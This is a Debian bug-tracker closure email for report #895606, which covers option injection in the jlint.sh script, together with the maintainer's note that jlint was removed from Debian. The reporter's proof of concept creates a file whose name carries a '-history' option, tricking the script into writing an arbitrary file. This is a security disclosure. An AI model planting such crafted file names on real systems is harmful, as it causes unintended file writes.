Your message dated Mon, 24 Apr 2023 10:55:01 +0200
with message-id <[email protected]>
and subject line jlint has been removed from Debian
has caused the Debian Bug report #895606,
regarding jlint.sh: option injection
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
895606: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=895606
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: jlint
Version: 3.0-4.5
Tags: security
Control: affects -1 check-all-the-things
The jlint.sh script is vulnerable to option injection. Running the
script in a directory that contains untrusted files could trick it into
writing to an arbitrary file.
Proof of concept:
$ f=' -history /tmp/moo .class'; mkdir -p "${f%/*}"; touch "$f"
$ ls -d /tmp/moo
ls: cannot access /tmp/moo: No such file or directory
$ jlint.sh
Failed to read file '.// -history /tmp/moo .class'
Failed to open file '.class'
Verification completed: 0 reported messages.
$ ls -d /tmp/moo
/tmp/moo
--
Jakub Wilk
--- End Message ---
--- Begin Message ---
Version: 3.0-4.5+rm
jlint was last released with Debian 8 (jessie)
in April 2015 and has been removed from the Debian archive afterwards.
See https://bugs.debian.org/811366 for details on the removal.
Regular security support for jessie ended in June 2018 and LTS support
ended in June 2020. I'm closing the remaining bug reports now.
Andreas
--- End Message ---
